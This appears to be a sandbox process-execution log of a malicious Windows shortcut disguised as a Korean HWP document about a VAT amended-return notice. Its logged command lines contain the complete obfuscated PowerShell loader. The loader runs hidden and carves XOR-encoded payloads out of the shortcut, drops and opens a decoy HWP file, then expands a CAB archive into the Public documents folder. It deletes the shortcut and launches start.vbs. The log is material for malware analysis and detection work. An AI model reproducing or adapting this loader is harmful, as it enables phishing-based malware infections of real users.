cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "iyfsPiQmGGeVn" "C:\Users\test22\AppData\Local\Temp\부가가치세 수정신고 안내(부가가치세사무처리규정).hwp.lnk"
2636
cmd.exe "C:\Windows\system32\cmd.exe" /c p^owe^rshe^l^l -windowstyle hidden function hyroGAN{param($gRRXdaln); $SEXiGo=Get''-C\"\"h''ild''I\"\"t\"\"e\"\"m -Path $gRRXdaln -Recurse *.lnk ^| wh\"\"er\"\"e\"\"-o\"\"bje''ct {$_.length -eq 0x03EE569C} ^| Sel''ect''-O\"\"bj\"\"e\"\"ct -ExpandProperty FullName; return $SEXiGo;};function DGTZUkn{param($FjFfNJyV,$NVUYZYa,$uJMIAV,$OPURoQ,$JiOPSEnH); $KhPAKsCs=New\"\"-Ob''jec\"\"t System.IO.FileStream($FjFfNJyV,[System.IO.FileMode]::Open,[System.IO.FileAccess]::Read); $KhPAKsCs.Seek($NVUYZYa,[System.IO.SeekOrigin]::Begin); $MlqewZMb=Ne\"\"w\"\"-O''bj\"\"e''ct byte[] $uJMIAV; $KhPAKsCs.Read($MlqewZMb,0,$uJMIAV); $KhPAKsCs.Close();for($PKVgpCbI=0;$PKVgpCbI -lt $uJMIAV;$PKVgpCbI++){$MlqewZMb[$PKVgpCbI]=$MlqewZMb[$PKVgpCbI] -bxor $OPURoQ;}sc $JiOPSEnH $MlqewZMb -Encoding Byte;};$JQCcrJ=Get\"\"-Lo\"\"c\"\"at''io\"\"n;$qurxYiEA=hyroGAN -gRRXdaln $JQCcrJ;if($qurxYiEA.length -eq 0){$qurxYiEA=hyroGAN -gRRXdaln $env:Temp;} $JQCcrJ=S''p\"\"lit\"\"-Pa\"\"t\"\"h $qurxYiEA;$TweLdPR = $qurxYiEA.substring(0,$qurxYiEA.length-4) + '';DGTZUkn -FjFfNJyV $qurxYiEA -NVUYZYa 0x00001C90 -uJMIAV 0x00011A00 -OPURoQ 0x68 -JiOPSEnH $TweLdPR;^& $TweLdPR;$LhwhYhz=$env:public + '\' + 'gRRXda.cab';DGTZUkn -FjFfNJyV $qurxYiEA -NVUYZYa 0x00013690 -uJMIAV 0x00013CD2 -OPURoQ 0x03 -JiOPSEnH $LhwhYhz;Rem\"\"ov''e''-I''t''em -Path $qurxYiEA -Force;expand $LhwhYhz -F:* ($env:public + '\' + 'documents');re\"\"mo''ve-\"\"i\"\"te\"\"m -path $LhwhYhz -force;$jHoteEl=$env:public+'\documents\start.vbs';^& $jHoteEl;
2764
powershell.exe powershell -windowstyle hidden function hyroGAN{param($gRRXdaln); $SEXiGo=Get''-C\"\"h''ild''I\"\"t\"\"e\"\"m -Path $gRRXdaln -Recurse *.lnk | wh\"\"er\"\"e\"\"-o\"\"bje''ct {$_.length -eq 0x03EE569C} | Sel''ect''-O\"\"bj\"\"e\"\"ct -ExpandProperty FullName; return $SEXiGo;};function DGTZUkn{param($FjFfNJyV,$NVUYZYa,$uJMIAV,$OPURoQ,$JiOPSEnH); $KhPAKsCs=New\"\"-Ob''jec\"\"t System.IO.FileStream($FjFfNJyV,[System.IO.FileMode]::Open,[System.IO.FileAccess]::Read); $KhPAKsCs.Seek($NVUYZYa,[System.IO.SeekOrigin]::Begin); $MlqewZMb=Ne\"\"w\"\"-O''bj\"\"e''ct byte[] $uJMIAV; $KhPAKsCs.Read($MlqewZMb,0,$uJMIAV); $KhPAKsCs.Close();for($PKVgpCbI=0;$PKVgpCbI -lt $uJMIAV;$PKVgpCbI++){$MlqewZMb[$PKVgpCbI]=$MlqewZMb[$PKVgpCbI] -bxor $OPURoQ;}sc $JiOPSEnH $MlqewZMb -Encoding Byte;};$JQCcrJ=Get\"\"-Lo\"\"c\"\"at''io\"\"n;$qurxYiEA=hyroGAN -gRRXdaln $JQCcrJ;if($qurxYiEA.length -eq 0){$qurxYiEA=hyroGAN -gRRXdaln $env:Temp;} $JQCcrJ=S''p\"\"lit\"\"-Pa\"\"t\"\"h $qurxYiEA;$TweLdPR = $qurxYiEA.substring(0,$qurxYiEA.length-4) + '';DGTZUkn -FjFfNJyV $qurxYiEA -NVUYZYa 0x00001C90 -uJMIAV 0x00011A00 -OPURoQ 0x68 -JiOPSEnH $TweLdPR;& $TweLdPR;$LhwhYhz=$env:public + '\' + 'gRRXda.cab';DGTZUkn -FjFfNJyV $qurxYiEA -NVUYZYa 0x00013690 -uJMIAV 0x00013CD2 -OPURoQ 0x03 -JiOPSEnH $LhwhYhz;Rem\"\"ov''e''-I''t''em -Path $qurxYiEA -Force;expand $LhwhYhz -F:* ($env:public + '\' + 'documents');re\"\"mo''ve-\"\"i\"\"te\"\"m -path $LhwhYhz -force;$jHoteEl=$env:public+'\documents\start.vbs';& $jHoteEl;
2872
Hwp.exe "C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe" "C:\Users\test22\AppData\Local\Temp\부가가치세 수정신고 안내(부가가치세사무처리규정).hwp"
2976
HimTrayIcon.exe "C:\Program Files (x86)\Hnc\Common80\HimTrayIcon.exe"
2108
expand.exe "C:\Windows\system32\expand.exe" C:\Users\Public\gRRXda.cab -F:* C:\Users\Public\documents
3040
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\documents\start.vbs"
940
explorer.exe C:\Windows\Explorer.EXE
1452